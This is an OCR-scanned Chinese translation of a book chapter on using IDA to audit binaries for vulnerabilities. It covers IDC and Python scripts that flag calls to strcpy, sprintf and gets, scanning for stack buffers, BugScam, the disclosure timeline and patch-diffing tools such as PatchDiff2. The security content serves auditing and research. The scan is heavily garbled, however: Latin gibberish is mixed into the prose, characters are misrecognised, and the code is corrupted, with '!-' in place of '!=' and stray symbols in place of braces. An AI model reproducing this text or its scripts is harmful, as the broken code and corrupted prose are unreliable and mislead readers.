几乎 可 以 肯定 , 你 需要 完成 某 种 类 型 的 去 模糊 任务 。 无 论 你 是 采用 调试 融 辅 助 的 动态 去 模糊 方法 ， 
还 是 不 想 运 行 可 能 恶意 的 代码 ,而 选择 使 用 脚本 或 模拟 对 二 进 制 文 件 进行 去 模糊 处 理 , 你 的 最 终 
目标 都 是 生成 一 个 可 以 被 完全 反 汇 编 、 正 确 分 析 的 去 模糊 二 进 制 文件 。 多 数 情况 下 ， 最 后 的 分 析 
都 要 由 IDA 之 类 的 工具 来 完成 。 鉴 于 此 ( 即使 用 IDA 进行 分 析 )， 符 试 从 头 至 尾 使 用 IDA. 似乎 
有 一 定 的 道理 。 本 章 讨论 的 各 种 技巧 旨 在 说 明 DA 除 生成 反 汇编 代码 清单 以 外 的 其 他 许多 功能 。 
在 第 25 章 中 , 我 们 将 再 次 讨论 模糊 代码 , 并 说 明 如 何 将 IDA 的 内 部 调试 硒 作 为 一 个 去 模糊 工具 。 
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IECH EN. deenen NIR. IDA 不 是 一 个 漏洞 发 现 工具 ， 我 们 说 过 ， 这 

ZE on am oe mech, IDA 似乎 具有 神奇 的 力量 。 许 多 人 似乎 认为 ， 仅 仅 用 
IDA 打开 一 个 二 进 制 文件 ,就 能 揭示 宣 宙 中 的 所 有 秘密 ; IDA 会 自动 生成 注释 清楚 地 解释 恶意 
软件 的 行为 ; 漏洞 将 会 以 红色 突出 显示 ; ARD SEE HAE SRI REN AO EARS Ls 
标 ，IDA 将 自动 生成 人 侵 代码 ……。 

虽然 IDA 确实 是 一 个 功能 非常 强大 的 工具 ， 但 是 ， 如 果 没 有 举 在 计算 机 前 的 聪明 用 户 
(以 及 一 组 方便 的 脚本 和 插件 )， 它 只 不 过 是 一 个 反 汇编 器 /调试 器 而 已 。 作 为 一 种 静态 分 析 
工具 ， 它 只 能 帮助 你 确定 软件 漏洞 的 位 置 。 最终 ， 你 需要 运用 自己 的 技能 ， 确 定 IDA Dm 
能 够 使 你 更 容易 地 搜索 到 漏洞 。 根 据 我 们 的 经 验 ，IDA 并 不 是 查找 新 漏洞 的 最 佳 工具 "， 但 
是 如 果 与 调试 器 结合 使 用 ，_ 日 我 们 发 现 _ 个 漏洞 ， 它 将 成 为 一 个 最 佳 工具 ,可 以 帮助 我 们 
开发 破解 程序 。 

在 过 去 几 年 中 ,IDA 已 经 开始 在 发 现 现 有 漏洞 时 扮演 一 个 新 角色 。 起 初 ， 搜 索 现 有 漏洞 的 做 
法 似乎 并 不 寻常 但 那 是 因为 我 们 没有 问 这 个 问题 : 对 于 这 些 漏洞 ， 我 们 到 底 了 解 哪些 信息 ? 了 
解 这 些 信息 的 人 又 是 淮 ?在 闭 源 、 二 进 制 占 绝对 主导 的 软件 领域 ,供应 商 经 常 发布 软件 补丁 ,但 
并 不 详细 说 明 这 些 补丁 的 作用 ,以 及 为 什么 发 布 这 些 补丁 。 通过 对 _ 款 软件 打 过 补丁 的 新 版 本 与 
未 打 补丁 的 旧版 本 进行 差异 性 分 析 ,我 们 可 以 隔离 出 二 进 制 文件 中 发 生变 化 的 区 域 。 假设 这 些 变 
化 不 会 无 故 发 生 ， 这 种 差异 性 分 析 技巧 能 够 为 我 们 提供 启示 ,确定 之 前 易 受 攻击 的 代码 序列 .由 
于 搜索 范围 明显 缩小 ,掌握 必要 的 技能 ， 人 们 就 能 够 开发 出 一 个 示例 破解 程序 ， 用 于 未 打 补丁 的 
系统 。 实 际 上 ， 由 于 微软 在 发 布 补丁 方面 众所周知 的 “补丁 星期 二 ”周期 ， 每 个 月 都 有 大 量 安全 
研究 人 员 准 备 静 下 心 来 ， 进 行 一 次 差异 性 分 析 。 

有 许多 专门 讨论 漏洞 分 析 的 书 2， 在 一 本 专门 介绍 IDA 的 书 中 ,仅仅 _ 章 内 容 不 可 能 全 面 措 
述 漏洞 分 析 这 一 主题 ,我们 将 要 做 的 是 假定 读者 熟悉 软件 漏洞 的 一 些 基本 概念 ( 如 缓冲 区 溢出 )， 
讨论 如 何 使 用 IDA 搜索 、 分 析 这 些 漏洞 ， 并 最 终 为 这 些 漏洞 开发 出 破解 程序 。 



































QD 通常， 与 静态 分 析 相 比 ， 使 用 模糊 测试 往往 能 够 发 现 更 多 的 漏洞 。 
(2) 例如， 参见 Jon Erickson 的 Hacking: The Art of Exploitation, 2nd Edition ( http://nostarch.com/hacking2.htm ). 
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22.4 使 用 IDA 发 现 新 的 漏洞 


漏洞 研究 人 员 采 用 许多 不 同 的 方法 发 现 程序 中 的 新 源 洞 。 如果 源 代码 可 用 , 我 们 可 以 利用 任 
何 数 量 的 目 动 化 源 代码 审核 工具 确定 一 个 程序 中 可 能 的 问题 区 域 。 许多 时 候 , 这 些 日 动 化 工具 只 
能 发 现 最 明显 的 漏洞 ， 而 要 发 现 隐藏 更 深 的 漏洞 则 需要 进行 大 量 的 手动 审核 。 

有 大 量 对 二 进 制 文件 进行 目 动 审核 的 工具 , 它们 提供 许多 与 日 动 源 代码 审核 工具 相同 的 报告 
功能 。 二 进 制 文件 目 动 分 析 的 一 个 明显 优势 在 于 使 用 它 不 需要 访问 应 用 程序 源 代码 。 因 此 ， 它 们 
可 以 对 闭 源 、 仅 二 进 制 的 程序 进行 自动 分 析 。Veracode" 开 始 提供 一 项 基于 订阅 的 服务 ， 用 户 可 
以 提交 二 进 制 文件 ， 由 Veracode 的 专用 二 进 制 文件 分 析 工 具 进行 分 析 。 虽 然 这 些 工 具 不 能 保证 
能 够 发 现 一 个 二 进 制 文件 中 的 部 分 或 全 部 漏洞 , 但 是 这 些 技 术 使 得 普通 用 户 也 能 够 利用 二 进 制 文 
件 分 析 工 具 ， 从 而 获得 一 定 程 度 的 目 信 心 ， 目 信和 他 们 使 用 的 软件 没有 漏洞 或 后 门 。 

无 论 是 在 源 代码 还 是 在 二 进 制 层次 上 进行 审核 ,基本 的 静态 分 析 技 巧 包括 :审核 问题 限 数 ( 如 
strcpy 和 sprintf ) 的 使 用 ,审核 动态 内 存 分 配 例 程 (如 malloc 和 VirtualAlloc ) 返回 的 缓冲 区 
的 用 法 ， 审 核 如 何 处 理 通 过 recv、read、fgets 和 许多 其 他 类 似 函 数 接收 的 用 户 提 交 的 输入 。 TE 
数据 库 中 找到 这 些 函 数 调用 的 位 置 并 非 难 事 。 例 如 ， 为 追踪 对 strcpy 的 所有 调用 ， 我们 可 以 采 
取 以 下 步 又。 

(1) 找到 strcpy 函数 。 

(2) 将 光标 放 在 strcpy 标签 上 上 ， 然 后 选择 View >» Open Subviews » Cross References， 显 示 
strcpy Pr DIr iz SC5 | HH. 

(3) 访问 每 一 个 交叉 引用 并 分 析 提 交 给 strcpy 的 人 参数， 确定 是 否 可 以 实现 绥 冲 区 溢出 。 

步骤 (3) 需 要 你 进行 大 量 代 码 分 析 和 数据 流 分 析 , 以 了 解 该 隐 数 调用 的 所 有 可 能 输入 ,希望 这 
个 任务 不 太 复 林 。 而 步骤 (1) 看 起 来 相当 人 简单， 实际 上 需要 你 费 点 神 。 要 想 找 准 strcpy WME, 
只 需要 使 用 Jump》Jump to Address 命令 (G ), 并 输入 strcpy 作为 跳 转 目标 地 址 即 可 ,在 Windows 
PE 二 进 制 文件 或 静态 链接 的 ELF 二 进 制 文件 中 ， 你 通常 只 要 这 样 做 就 可 以 了 。 但 是 ， 对 于 其 他 
的 二 进 制 文件 ， 你 可 能 需要 采取 其 他 的 步骤 。 在 动态 链接 的 ELF 二 进 制 文件 中 ,使 用 Jump 命令 
并 不 能 直接 将 你 带 到 你 想 要 的 函数 ,但 会 将 你 带 到 extern 市 (参与 了 动态 链接 过 程 ) 中 的 一 个 
条 日 。extern 节 中 的 strcpy 条 目的 IDA 表示 形式 如 下 所 示 : 






























































€) extern:804DECC extrn strcpy:near ; CODE XREF: _strcpy 个 ] 
extern:804DECC ; DATA XREF: .got:off 804D5E4 个 o 











使 间 题 更 加 复杂 的 是 ， 这 个 位 置 看 起 来 似乎 根本 就 不 叫 strcpy《〈 它 的 确 是 叫 strcpy， 但 这 
MAERAH), 对 这 个 位 置 的 唯一 一 个 代码 交叉 引用 C @ ) 是 一 个 以 _strcpy 函数 为 源头 的 跳 转 
交叉 引用 ， 同 时 ， 这 个 位 置 还 有 一 个 以 .got 节 为 源头 的 数据 交 义 引用 。 实 际 上 ， 引 用 的 函数 叫 
做 .strcpy， 在 上 面 的 代码 段 中 你 根本 看 不 到 这 个 名 称 。 在 这 个 例子 中 ，IDA H FRIRE Y A 




















D 参见 http://www.veracode.com/。 
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字符 ， 因 为 在 默认 情况 下 ，IDA 将 点 视 为 无 效 的 标识 符 字 符 。 双 击 代 码 交 义 引 用 ， 我 们 将 看 到 程 
序 中 strcpy 的 过 程 链接 表 ( .plt ) 条 目 ， 如 下 所 示 : 


.plt:08049E90 strcpy proc near ; CODE XREF: decode+5F Vp 
.p1t:08049E90 ; extract int argument«24N/p ... 
.plt:08049E90 jmp ds :off 804D5E4 


.plt:08049E90 strcpy endp 











如 果 我 们 访问 数据 交叉 引用 ， 最 后 我 们 将 看 到 strcpy 对 应 的 .got 条 上 日 ， 如 下 所 示 : 





.got:0804D5E4 off 804D5E4 dd offset strcpy ; DATA XREF: _strcpy 个 r 





在 .got 条 目 中 ,我 们 遇 到 另 一 个 以 .pt 节 中 的 .strcpy 函数 为 日 标的 数据 交 又 引用。 实际 

上 ， 跟 踪 数 据 交 叉 引 用 是 由 extern 节 导 航 到 .plt 节 最 为 可 靠 的 方法 。 在 动态 链接 的 ELF 二 进 
制 文件 中 ， 矣 数 通 过 过 程 链接 表 间 接 调 用 。 现 在 ,我 们 已 经 到 达 .plt 段 ， 我 们 可 以 集中 所 有 对 
strcpy (实际 上 是 .strcpy ) 的 交叉 引用 ， 并 开始 审核 每 一 个 调用 ( 在 这 个 例子 中 至 少 有 两 个 


SI )。 

如 有 果 我 们 有 一 组 常用 的 孔 数 , 并 且 和 希望 找到 调用 它们 的 位 置 并 审核 , 那么 这 个 过 程 可 能 会 变 
得 相当 烦 天 。 这 时 ， 开 发 一 段 IDC 脚本 ,使 用 注释 目 动 定位 和 标记 我 们 感 兴趣 的 所 有 函数 调用 ， 
会 对 我 们 有 所 帮助 。 利 用 注释 标记 ,我 们 可 以 进行 镜 单 的 搜索 ， 由 一 个 审核 位 置 移 动 到 为 一 个 审 
核 位 置 。 这 个 脚本 的 基础 是 一 个 函数 , 它 能 够 可 徘 地 定位 男 一 个 函数 ， 以 便 我 们 能 够 定位 所 有 以 
它 为 目标 的 交叉 引用 。 基 于 从 前 面 的 讨论 获得 的 对 ELF 二 进 制 文件 的 理解 ， 代 码 清 单 22-1 中 的 
IDC 函数 以 一 个 函数 名 称 为 参数 ， 返 回 一 个 适合 交叉 引用 迭代 的 地 址 。 


代码 清单 22-1 查找 一 个 果 数 的 可 调用 地 址 


static getFuncAddr(fname) { 
auto func - LocByName(fname); 
if (func !- BADADDR) ( 
auto seg - SegName(func); 
//what segment did we find it in? 
if (seg == "extern") { //Likely an ELF if we are in "extern" 
//First (and only) data xref should be from got 
func = DfirstB(func); 
if (func !- BADADDR) ( 
seg - SegName(func); 
if (seg !- ".got") return BADADDR; 
//Now, first (and only) data xref should be from plt 
func = DfirstB(func); 
if (func !- BADADDR) { 
seg - SegName(func); 
if (seg !- ".plt") return BADADDR; 
J 


























j 


else if (seg !- ".text") 1 
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//otherwise, if the name was not in the .text section, then we 
// don't have an algorithm for finding it automatically 
func = BADADDR; 
| 
} 


return func; 


j 


利用 得 到 的 返回 地 址 , 现在 我 们 可 以 追踪 任何 我 们 想 要 审核 其 用 法 的 函数 的 引用 。 代码 清单 
22-2 中 的 IDC 函数 利用 前 一 个 例子 中 的 getFuncAddr 函数 获得 一 个 函数 地 址 , 并 为 对 该 函数 的 所 
有 调用 添加 注释 。 


代码 清单 22-2. 标记 对 指定 函数 的 调用 
static flagCalls(fname) { 
auto func, xref; 
//get the callable address of the named function 
o func = getFuncAddr(fname); 
if (func !- BADADDR) ( 
//Iterate through calls to the named function, and add a comment 
//at each call 
e for (xref = RfirstB(func); xref !- BADADDR; xref = RnextB(func, xref)) { 
if (XrefType() == fl CN || XrefType() == fl CF) { 
MakeComm(xref, "*** AUDIT HERE ***"); 
j 








//Iterate through data references to the named function, and add a 
//comment at reference 
e for (xref = DfirstB(func); xref !- BADADDR; xref = DnextB(func, xref)) { 
if (XrefType() == dr 0) { 
MakeComm(xref, "*** AUDIT HERE ***"); 

j 

Í 

} 
} 


找到 我 们 想 要 的 函数 地 址 后 ( @ 0, HAHAA eg ir H HEALS. TESTS 
一 个 循环 (@ ) 中 ， 在 每 一 个 调用 该 函数 的 位 置 插 入 一 段 注释 。 在 第 二 个 人 循环 ( @ ) 中 ， 在 每 一 
个 使 用 该 函数 地 址 的 位 置 插入 其 他 注释 ( 使 用 一 个 偏 移 量 交 义 引 用 Os 为 了 跟踪 以 下 形式 的 调用 ， 
我 们 需要 第 二 个 循环 : 








€ .text:000194EA mov esi, ds:strcpy 
. text :000194F0 push offset loc 40A006 
. text :000194F5 add edi, 160h 
. text :000194FB push edi 


@ .text:000194FC call esi 


在 这 个 例子 中 ， 编 详 融 将 stropy 函数 的 地 址 缓存 到 ESI 寄存 胡 中 〈《@ )， 以 方便 程序 随后 更 
快 地 调用 strcpy PRAEC ( 6 0; 这 里 的 call 指令 执行 起 来 更 加 快捷 ， 因 为 它 不 但 更 小 (2 个 字 市 )， 
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而 且 不 需要 执行 额外 的 操作 来 解析 调用 目标 ， 因 为 函数 地 址 已 经 包含 在 CPU 的 ESI rte ée, 
当 一 个 图 数 多 次 调用 另 一 个 困 数 时 ， 编 译 需 可 以 选择 牛 成 这 种 类 型 的 代 人 码 。 

由 于 这 个 例子 中 的 本 数 调 用 属于 间接 调用 ， 因 此 我 们 例子 中 的 flagCalls KRUR BEA all 
strcpy 为 目标 的 数据 交叉 引用 ( @ )， 而 无 法 看 到 对 strcpy 的 调用 ( @ )， 因 为 ca11 指令 并 不 直 
接 引 用 strcpy。 但 是 , 实际 上 ,IDA 能 够 执行 有 限 的 数据 流 分 析 ,， 并 且 可 以 生成 下 面 的 反 汇 编 代 
人 码 清单 : 





.text:000194EA mov esi, ds:strcpy 
.text:000194F0 push offset loc 40A006 
. text :000194F5 add edi, 160h 
. text :000194FB push edi 

€ .text:000194FC call esi ; strcpy 


注意， 这 里 的 call 指令 (9) 包含 一 段 注释 ， 它 指出 IDA 认为 该 指令 所 调用 的 函数 。 除 了 
插入 注释 外 ，IDA 还 添加 了 一 个 以 调用 点 为 源头 、 以 被 调用 函数 为 目标 的 代码 交叉 引用 。 这 对 
flagCalls 函数 有 利 ,， 因 为 这 样 它 将 能 够 发 现 这 个 例子 中 的 call 指令 , 并 通过 一 个 代码 交叉 引用 
为 其 添加 注释 。 

为 了 完善 示例 脚本 ， 我 们 需要 一 个 main 函数 ， 它 将 为 所 有 我 们 想 审 核 的 函数 调用 flag- 
Calls。 下 面 这 个 简单 示例 说 明 如 何 标 记 对 本 节 前 面 提 到 的 一 些 函 数 的 调用 : 














static main() { 
flagCalls("strcpy"); 
flagCalls("strcat"); 
flagCalls("sprintf"); 
flagCalls("gets"); 

} 


运行 这 上 段 脚 本 后 ， 可 以 通过 搜索 插入 的 注释 文本 **AUDIT**， 由 我 们 感 兴趣 的 一 个 调用 转移 
到 男 一 个 调 有 用。 当然， 从 分 析 的 角度 看 ,我 们 还 有 许多 工作 要 做 ， 因 为 一 个 程序 调用 strcpy, 并 
不 表示 这 个 程序 可 以 被 利用 。 这 时 ， 我们 需要 进行 数据 流 分 析 。 为 了 理解 stropy 函数 的 一 个 特 
殊 调 用 是 否 可 被 利用 ， 你 必须 确定 strcpy 接收 到 的 参数 ， 并 评估 是 否 能 够 以 对 你 有 利 的 方式 操 
纵 这 些 参数 。 

与 寻找 对 问题 函数 的 调用 相 比 , 数据 流 分 析 是 一 个 更 加 复杂 的 任务 。 为 了 跟踪 静态 分 析 环 境 
中 的 数据 流 ， 你 需要 全 面 理解 这 个 环境 所 使 用 的 指令 集 。 因 此 , 你 的 静态 分 析 工 具 需 要 了 解 寄存 
器 在 什么 地 方 分 配 到 了 值 , 这 些 值 如 何 变 化 并 扩散 到 其 他 寄存 器 。 而 且 , 你 的 工具 需要 确定 在 程 
序 中 被 引用 的 来 源 和 目标 缓冲 区 的 大 小 , 这 需要 你 了 解 栈 帧 和 全 局 变量 的 布局 , 并 推断 动态 分 配 
的 内 存 块 的 大 小 。 当 然 ， 我 们 需要 在 不 运行 程序 的 前 提 下 了 人 解 所 有 这 些 信息 。 

Halvar Flake 创建 的 BugScam" 脚 本 是 通过 创意 脚本 编写 方法 完成 的 , 它 为 我 们 提供 了 一 个 有 
趣 的 示例 。BugScam 采用 的 技巧 与 前 面 的 例子 使 用 的 技巧 类 似 ， 即 找到 调用 问题 函数 的 位 置 ,并 





























(D 参见 http://www.sourceforge.net/projects/bugscam。 
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采取 额外 的 步骤 对 每 一 个 图 数 调用 进行 基本 的 数据 流 分 析 。BugScam 分 析 的 结果 是 一 份 HTML 
报告 ， 指 出 二 进 制 文件 中 可 能 存在 的 问题 。 分 析 sprintf 得 到 的 样本 报告 表 如 表 22-1 HZR o 


表 22-1 样本 报告 表 








地 址 严重 程度 Jf 述 
8048c03 5 数据 的 最 大 扩展 大 于 目标 缓冲 区 ,这 可 能 是 缓冲 区 溢出 的 原因 。 最 大 扩展 为 1053。 
目标 大 小 为 1036 


在 这 个 例子 中 , BugScam 能 够 确定 输入 和 输出 缓冲 区 的 大 小 。 如 果 与 格式 化 字符 串 包含 的 格 
式 指示 符 结合 ， 它 们 可 用 于 确定 程序 生成 的 输出 的 最 大 尺寸 。 

开发 这 种 类 型 的 脚本 需要 我 们 深入 了 解 各 种 破解 程序 , 以 设计 一 种 适用 于 各 种 二 进 制 文件 的 
算法 。 不 过 ， 即 使 缺乏 这 方面 的 知识 ,我们 仍然 能 够 开发 出 一 些 脚本 (或 插件 )， 与 手动 寻找 答 
案 相 比 ， 它 们 可 以 更 快 地 为 我 们 解答 一 些 简单 的 问题 

举 最 后 一 个 例子 ,假设 需要 定位 包含 栈 分 配 的 缓冲 区 的 所 有 函数 ， 因 为 这 些 函数 可 能 会 受到 
基于 栈 的 缓冲 区 溢出 攻击 。 相 比 于 手动 浏览 数据 库 ， 我 们 可 以 开发 一 个 脚本 ， 分 析 每 个 函数 的 楼 
帆 ， 寻 找 占 用 大 量 空间 的 变量 。 代 码 清单 22-3 中 的 Python 函数 遍历 一 个 给 定 函数 的 栈 帧 的 已 定 
义 成 员 ， 从 中 搜索 其 大 小 大 于 指定 最 小 大 小 的 变量 。 


代码 清单 22-3 ”扫描 栈 分 配 的 缓冲 区 
def findStackBuffers(func addr, minsize): 
prev idx - -1 
frame - GetFrame(func addr) 
if frame == -1: return #bad function 
idx - 0 
prev = None 
while idx « GetStrucSize(frame): 

















o member - GetMemberName(frame, idx) 
if member is not None: 
if prev idx !- -1: 
#compute distance from previous field to current field 
o delta - idx - prev idx 
e if delta »- minsize: 


Message(" bs: possible buffer Xs: %d bytesNn" % \ 
(GetFunctionName(func addr), prev, delta)) 
prev idx - idx 
prev - member 


e idx = idx + GetMemberSize(frame, idx) 
else: 
o idx = idx + 1 


"Tree EX peor Rp 9 br ër 29U DR E ER ATH] GetMemberName ( @ )， 定 位 该 栈 帧 中 的 所 
有 变量 。 变 量 的 大 小 通过 两 个 连续 变量 起 始 偏 移 量 之 间 的 差 值 计算 出 来 ( @@ )。 如 果 这 个 大 小 超 
过 一 个 阅 值 大 小 (minsize，@ )， 则 在 报告 中 指出 ， 这 个 变量 是 一 个 可 能 溢出 的 栈 缓冲 区 。 如 果 
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当前 偏 移 量 位置 处 没有 定义 结构 体 成 员 ， 则 结构 体 索 引 以 工 字 节 递 增 (@ )， 否 则 ， 则 按 在 当前 
偏 移 量 位 置 发 现 的 任何 成 员 的 大 小 递增 ( @ )。 在 计算 每 个 栈 变 量 的 大 小 时 ，GetMemberSize PK 
数 似乎 是 一 个 更 合适 的 选择 ， 但 前 提 是 ，IDA 或 用 户 已 经 正确 确定 了 变量 的 大 小 。 以 下 面 的 栈 
hm Dt. 


.text:08048B38 sub 8048B38 proc near 
. text :08048B38 
.text:08048B38 var 818 
.text:08048B38 var 418 
.text:08048B38 var C 
.text:08048B38 arg 0 











byte ptr -818h 
byte ptr -418h 
dword ptr -oCh 
dword ptr 8 


使 用 列表 中 显示 的 字 节 侦 移 量 ， 我 们 可 以 计算 出 : TE var 818 与 var 418 的 起 始 偶 移 量 之 间 
有 1024 个 字 节 (818h-418h=400h )， 在 var 418 与 var C 的 起 始 偏 移 量 之 间 有 1036 个 字 节 
(418h-0Ch ) 但 是 ， 这 个 栈 帧 可 以 被 扩展 ， 以 显示 以 下 布局 : 





-00000818 var 818 db ? 

-00000817 db ? ; undefined 
-00000816 db ? ; undefined 
-0000041A db ? ; undefined 
-00000419 db ? ; undefined 
-00000418 var 418 db 1036 dup(?) 
-0000000€ var C dd ? 





从 中 可 以 看 到 ，var_418 已 经 折 闭 成 一 个 数组 ， 而 var_818 仅仅 只 有 一 个 字 节 〈 有 1023 个 未 
定义 的 字 方 填充 var_818 与 var_418 之 则 的 空间 ), 对 于 这 个 栈 布局 ,GetMemberSize 将 报告 var_818 
BANI 15€, var 418 的 大 小 为 1036 个 字 方 ， 这 并 不 是 我 们 希望 见 到 的 结 采 。 无 论 var_818 
被 定义 为 一 个 字 节 还 是 一 个 1024 字 节 的 数组 ， 调 用 findStackBuffers(0x08048B38, 16) 将 得 到 以 
下 输出 : 


sub 8048B38: possible buffer var 818: 1024 bytes 
sub 8048B38: possible buffer var 418: 1036 bytes 


创建 一 个 main PK, fiios DIS E TP BS PE PRG (SI 15 章 )， 并 为 每 个 函数 调用 
findStackBuffers， 我 们 将 得 到 一 个 脚本 ， 该 脚本 能 够 迅速 指出 程序 的 栈 缓冲 区 的 使 用 情况 。 妆 
然 ， 要 确定 这 些 缓冲 区 是 否 能 够 溢出 ， 需 要 我 们 对 每 个 函数 进行 额外 的 分 析 〈 通 和 党 是 手动 分 析 )。 
正 是 由 于 静态 分 析 非 常 单调 乏味 ， 才 使 得 模糊 测试 变 得 如 此 流行 。 


22.2 ”使 用 IDA 在 事后 发 现 漏洞 


对 于 发 现 软件 漏洞 的 具体 过 程 ,一 直 以 来 都 存在 激烈 的 讨论 。 对 于 在 软件 中 发 现 的 任何 漏洞 ， 
我 们 都 可 以 指定 ( 源 洞 ) 发 现 者 和 ( 软件 ) 维护 者 的 角色 。 此 外 ,我 们 还 可 以 指定 在 发 现 漏洞 的 
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过 程 中 可 能 或 不 可 能 发 生 的 许多 事件 。 下 面 我 们 简要 描述 其 中 一 些 事 件 。 请 记 住 ， 发现 漏 洞 的 整 
个 过 程 是 人 们 激烈 争论 的 主题 ,下面 的 这 些 术 语 绝 非 标准 ， 也 未 被 广泛 接受 。 
OQ 发 现 。 最 初 发 现 一 个 漏洞 的 时 刻 。 为 了 方便 讨论 ， 我 们 还 把 这 个 时 刻 看 成 是 初步 开发 一 
个 针对 该 漏洞 的 破解 程序 的 时 刻 。 
Q 通知 。 软 件 维护 者 最 初 知道 其 产品 中 存在 漏洞 的 时 刻 。 如 果 是 供应 商 自 己 发 现 的 漏洞 ， 
则 这 个 时 刻 与 “发 现 ” 时 刻 一 样 。 
D 公布 。 回 公众 公布 漏洞 的 时 刻 。 根 据 所 发 布 的 有 关 漏 洞 的 细节 信息 ， 这 个 事件 可 能 会 令 
人 困惑 。 公 布 可 能 伴随 着 发 布 或 识别 有 效 的 破解 程序 。 有 时 候 ， 公 布 也 会 作为 通知 提供 
给 供应 商 。 
OQ 缓解 。 公 布防 范 措施 的 时 刻 ， 如 果 遵 循 这 些 措 施 ， 用 户 可 以 免 于 成 为 现 有 破解 程序 的 受 
害 者 。 绥 解 措 施 是 等 竺 发布 补丁 的 用 户 的 折 中 解决 方案 。 

OQ 补丁 可 用 性 。 维 护 者 〈 或 第 三 方 ) 为 易 受 攻击 的 软件 提供 更 正版 本 的 时 刻 。 

D 补丁 应 用 。 用 户 安 装 已 更 新 、 已 更 正 的 软件 ,使 自己 免 受 (希望 如 此 ) 所 有 依赖 于 给 定 

漏洞 的 已 知 攻击 侵害 的 时 刻 。 

有 大 量 论文 介绍 所 有 有 关 漏 洞 的 信息 , 如 漏洞 发 现 者 和 维护 者 的 责任 ,他 们 应 公开 多 少 信息 ， 
应 何 时 公开 这 些 信息 等 。 通 常 ， 供 应 商会 在 公开 漏洞 的 同时 发 布 补 丁 。 

许多 时 候 , 供应 商 在 发 布 补丁 的 同时 ,还 会 发 布 一 个 漏洞 公告 。 这 个 漏洞 公告 提供 了 一 些 技 
术 信息 , 描述 已 被 补丁 修复 的 问题 的 本 质 和 严重 程度 , 但 这 些 信息 的 详细 程度 一 般 不 足以 开发 一 
个 针对 该 问题 的 有 效 破解 程序 。 那 么 ,为 什么 有 人 想 要 开发 一 个 有 效 的 破解 程序 呢 ? 很 明显 ,一 
些 人 想 要 利用 那些 还 没有 安装 补丁 的 计算 机 。 开 发 破解 程序 的 速度 越 快 , 他 们 利用 更 多 计算 机 的 
几率 就 越 大 。 另 外 ,供应 商 可 能 希望 开发 一 些 工 具 , 用 于 扫描 网 络 中 未 安装 补丁 的 系统 ， 或 者 找 
到 一 些 技巧 ， 以 实时 检测 入侵 尝试 。 多 数 情 况 下 ,开发 这 样 的 工具 需要 开发 者 深入 了 解 新 修复 的 
漏洞 的 本 质 。 

漏洞 公告 中 可 能 缺乏 一 些 基本 的 信息 ,如 包含 漏洞 的 具体 文件 、 任 何 易 受 攻击 的 纯 数 的 名 称 
或 位 置 ， 以 及 这 些 函 数 中 的 什么 内 容 被 变更 。 但 是 ,被 修复 的 文件 本 身 包含 了 大 量 信息 ， 破 解 程 
序 开 发 者 可 以 借助 这 些 信 息 开 发 一 个 利用 新 修复 的 漏洞 的 有 效 破 解 程 序 。 一 开始 , 这些 信 息 并 不 
十 分 明显 , 看 起 来 似乎 不 能 被 破解 程序 开发 者 使 用 。 我 们 为 消除 基本 的 漏洞 所 做 的 变更 正 是 这 些 
信息 的 表示 形式 。 要 突出 这 些 变更 , 一 个 最 简单 的 方法 是 将 已 打 补 丁 的 二 进 制 文件 与 对 应 的 未 打 
补丁 的 文件 比较 。 如 果 只 需要 在 已 打 补 丁 的 源 文件 中 寻找 不 同 , 那么 , 使 用 diff 之 类 面向 文本 、 
较为 实用 的 标准 工具 ， 就 可 以 迅速 指出 发 生变 更 的 位 置 。 然而， 跟踪 一 个 二 进 制 文件 的 两 个 修订 
版 本 之 间 的 行为 变更 ， 远 比 简 单 的 文本 文件 比较 复杂 得 多 。 

使 用 差异 计算 隔离 两 个 二 进 制 文件 中 发 生 的 变更 的 困难 在 于 , 二进制 文件 可 能 会 因为 各 种 
原因 而 发 生变 更 。 有 许多 操作 都 有 可 能 触发 变更 ， 如 编译 器 优化 、 编 译 器 本 身 的 变化 、 源 代码 
重组 、 添 加 与 漏洞 无 关 的 代码 ， 当 然 还 有 添加 修复 漏洞 的 代码 。 我 们 面临 的 挑战 在 于 如 何 将 行 
为 变更 ( 如 那些 修改 漏洞 所 需 的 变更 ) 与 表面 变更 ( 如 使 用 不 同 的 寄存 融 完 成 相同 的 任务 ) 区 
分 开 来 。 
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有 很 多 工具 专门 用 于 二 进 制 文件 差异 比较 ， 包 括 Zynamics 开发 的 商业 版 BinDiff、eEye 
Digital Security 开发 的 免费 BDS (二 进 制 差 异 比较 套件 ) 可 以 Core Labs ( 属于 Core Impact" 的 开 
发 者 Core Security) 下 载 的 免费 工具 Turbodiff 以 及 Nicolas Pouvesle 的 PatchDiff2 ^, 3xJ6 TH 
的 每 一 种 都 以 某 种 方式 依赖 于 提供 的 IDA。 BinDiff fl BDS 利用 IDA 脚本 和 插件 对 所 分 析 的 二 进 
制 文件 的 已 打 补 本 版 本 和 未 打 补 丁 版 本 进行 初步 的 分 析 。 由 插件 提取 出 的 信息 存储 在 一 个 后 问 数 
据 库 中 。 每 个 工具 均 提 供 一 个 基于 图 形 的 显示 和 窗口， 并 可 以 导航 在 分 析 阶 段 检测 到 的 差异 。 
Turbodiff 和 PatchDiff2 以 IDA 插件 的 方式 实现 ， 并 在 IDA 中 显示 它们 的 结 采 。 使 用 这 些 工具 的 
最 终 目 的 是 迅速 指出 修复 一 个 漏洞 需要 做 出 的 变更 ,以 快速 了 解 代 码 吻 于 受到 攻击 的 原因 。 有 关 
这 两 款 产 品 的 其 他 信息 ， 请 访问 它们 各 自 公 司 的 网 站 。 

PatchDiff2 是 一 蒜 典 型 的 免费 差 寞 比较 工具 ， 它 是 一 个 开源 项 目 ， 提 供 该 插件 的 32 位 和 64 
位 已 编译 Windows 版 本 以 及 用 于 访问 该 插件 源 代码 的 子 版 本 。 要 安 疙 该 插件 ， 只 知 将 插件 二 进 
制 文件 复制 到 <IDADIR>/plugins 目录 中 即 可 。 

使 用 PatchDiff2 ( 参见 表 22-2 ) 的 第 一 步 是 创建 两 个 独立 的 IDA 数据 库 , 分 别 用 于 要 比较 的 
两 个 二 进 制 文件 。 wi, 一 个 数据 库 用 于 二 进 制 文件 的 原始 版 本 ， 而 男 一 个 数据 库 则 用 于 该 二 进 
制 文件 的 已 打 补 丁 版 本 。 






































SS 22-2 PatchDiff2 


名 称 PatchDiff2 
作者 Nicolas Pouvesle 

发 布 用 于 IDA 5.7 的 源 代 码 和 二 进 制 文件 
价格 免费 

描述 生成 并 显示 二 进 制 文件 差异 

信息 http://code.google.com/p/patchdiff2/ 








通常 ， 如 果 调 用 该 插件 ,将 打开 用 于 原始 二 进 制 文件 的 数据 库 ， 然 后 通过 Edit » Plugins ( 编 
